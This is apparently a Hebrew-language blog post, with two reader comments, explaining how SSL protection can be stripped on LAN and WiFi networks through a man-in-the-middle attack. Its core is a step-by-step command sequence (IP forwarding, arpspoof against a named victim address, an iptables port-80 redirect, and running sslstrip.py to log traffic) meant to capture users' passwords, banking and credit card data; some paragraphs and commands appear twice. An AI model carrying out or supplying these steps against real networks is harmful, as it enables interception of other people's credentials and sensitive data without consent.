שימוש ב - SSL נמצא היום בכל מקום בנקים,קניונים וירטואלים,חנויות Online ועוד.
עד היום שהתחברנו ל - SSL הרגשנו בטוחים (אף אחד לא יכול לראות ולהאזין למידע שעובר בתווך
מכיוון והמידע מוצפן ובלי התעודה הדיגטאלית לא ניתן לפתוח ולהבין אותו) מצב זה השתנה לאחרונה
ועל ידי שימוש ב - MITM ברשתות LAN, WIFI ובשימוש ב - SSL Strip ניתן להאזין לכלל המידע
שעובר ברשת הכולל סיסמאות של משתמשים נתונים רגישים מידע על חשבונות בנק ,כרטיסי אשראי
ועוד.
עד היום שהתחברנו ל - SSL הרגשנו בטוחים (אף אחד לא יכול לראות ולהאזין למידע שעובר בתווך
מכיוון והמידע מוצפן ובלי התעודה הדיגטאלית לא ניתן לפתוח ולהבין אותו) מצב זה השתנה לאחרונה
ועל ידי שימוש ב - MITM ברשתות LAN, WIFI ובשימוש ב - SSL Strip ניתן להאזין לכלל המידע
שעובר ברשת הכולל סיסמאות של משתמשים נתונים רגישים מידע על חשבונות בנק ,כרטיסי אשראי
ועוד.
להלן הפעולות שיש לבצע על מנת שתהליך זה יעבוד כראוי:
172.16.0.1 =>GATEWAY
172.16.0.66 => VICTIM
בשלב הראשון עלינו לבצע את פעולת ה - MITM על ידי שימוש בפקודות הבאות:172.16.0.66 => VICTIM
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.0.66 172.16.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
arpspoof -i eth0 -t 172.16.0.66 172.16.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
בשלב הבא יש להריץ את SSL STRIP בעזרת הפקודה הבא:
python sslstrip.py -w secret
להורדת הכלי ניתן לפנות ללינק הבא:
למצגת המלאה (ממליץ לא לפספס):
לרקע על המצגת:
2 תגובות:
תגיד אחי לא נראה לך שזה עתיק?
ועוד משהו.. היו שמועות שאתה מציג בכנס ההאקרים ולא ראיתי שם כלום עליך איך זה? אני מדבר על זה http://www.ilhack.org
dar היי
לא זה לא עתיק אם תקרא ותשמע את כל ההרצאה תראה שזה מ - Blackhat 09 ו - SSL STRIP (הכלי) יצא ב - 02/25/09
בקשר לשמועות אני לא מכיר את השמועה הזו כרגע.
לא שאני פוסל את האופציה אבל לא חשבתי על זה עוד אשמח לראות על מה אתה מדבר אם יש איזה לינק עדכן אותי פה.
הוסף רשומת תגובה